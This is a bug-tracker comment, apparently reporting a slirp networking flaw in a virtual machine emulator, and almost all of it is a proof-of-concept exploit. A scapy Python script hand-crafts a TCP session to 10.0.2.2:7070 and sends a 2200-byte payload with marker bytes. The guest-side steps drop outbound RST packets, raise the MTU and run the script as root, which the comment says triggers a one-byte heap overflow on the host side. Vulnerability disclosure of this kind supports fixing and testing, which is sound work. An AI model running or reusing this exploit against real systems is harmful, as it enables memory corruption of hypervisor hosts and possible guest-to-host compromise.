Comment 3 for bug 1858415

r1ng0hacking (r1ng0hacking) wrote :

PoC:
```python
#!/usr/bin/python3

import os
import time
from scapy.all import *

# Address and port of the host-side listener as seen from the guest: the
# `nc -l -p 7070` step in this report listens on 7070 and the iptables rule
# names 10.0.2.2 as the same destination.
target_ip = '10.0.2.2'
target_port = 7070

def start_tcp(target_ip: str, target_port: int, str_to_send: str) -> None:
    """Complete a TCP three-way handshake with scapy and push one payload.

    The SYN, ACK and PSH/ACK segments are crafted directly with scapy rather
    than through a kernel socket, so the local kernel never owns the
    connection; the environment must keep the kernel from answering the
    peer's SYN/ACK with a RST (the iptables rule in this report does that).

    Args:
        target_ip: destination IPv4 address.
        target_port: destination TCP port.
        str_to_send: payload carried in the final PSH/ACK segment.

    Returns:
        None. Any error is printed, not raised.
    """
    # Made global here, but nothing else in this listing reads them.
    global sport,s_seq,d_seq
    try:
        # SYN (flags=0x02) from a random source port with a random ISN;
        # sr1() returns the first reply (expected SYN/ACK).  On timeout
        # sr1() returns None and the subscripts below raise.
        ans = sr1(IP(dst=target_ip)/TCP(dport=target_port,sport=RandShort(),seq=RandInt(),flags=0x2),verbose=False)
        # The reply's dport is the random sport we used, its ack is our next
        # sequence number, and its seq+1 acknowledges the peer's SYN.
        sport = ans[TCP].dport
        s_seq = ans[TCP].ack
        d_seq = ans[TCP].seq+1

        # Bare ACK (flags=0x10) completes the handshake.
        send(IP(dst=target_ip)/TCP(dport=target_port,sport=sport,ack=d_seq,seq=s_seq,flags=0x10),verbose=False)

        # PSH|ACK (flags=0x18) carrying the whole payload in one segment.
        send(IP(dst=target_ip)/TCP(dport=target_port,sport=sport,ack=d_seq,seq=s_seq,flags=0x18)/str_to_send,verbose=False)
        print(ans[TCP])
    except Exception as e:
        # Broad catch: any failure (no reply, raw-socket error, ...) is
        # printed and swallowed, so the caller cannot tell success from failure.
        print(e)

if __name__ == '__main__':
    # Payload: 2200 filler characters of 'R'.  Per the `ip link` note in this
    # report, a payload larger than the default MTU is what reaches the
    # heap-allocated path in the receiver.
    buf = ['R' for n in range(2200)];
    buf_len = len(buf);

    # Overwrite the tail of the filler: "PNA\0" (0x50 0x4e 0x41 0x00) at
    # offsets len-10..len-7 and ESC (0x1b) as the very last byte.  The
    # significance of these marker bytes is not explained in this comment.
    buf[buf_len-10]= chr(0x50)
    buf[buf_len-9] = chr(0x4e)
    buf[buf_len-8] = chr(0x41)
    buf[buf_len-7] = chr(0x00)
    buf[buf_len-1] = chr(27)
    # Join into one str and hand it to the handshake helper above.
    start_tcp(target_ip,target_port,"".join(buf))
```

In host OS run:

```shell
# Host-side listener on the script's target_port (7070); it only accepts the
# connection and prints what arrives, the guest-side script drives the exchange.
nc -l -p 7070
```

In guest OS run:

```shell
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.0.2.2 -j DROP # The guest kernel has no socket for the scapy-built connection and would answer the peer's SYN/ACK with a RST, tearing the session down; dropping outbound RSTs to 10.0.2.2 lets the handshake in start_tcp() complete.
# ip link set ens3 mtu 3000 # With the MTU raised above the default, the 2200-byte payload goes out as a packet larger than the default MTU; slirp_input then allocates space for it from the heap, and one byte of that allocation is overflowed.
# ./poc # Run the script above as root (the `#` prompt): scapy needs raw sockets to craft the segments.
```

This causes a one-byte heap overflow.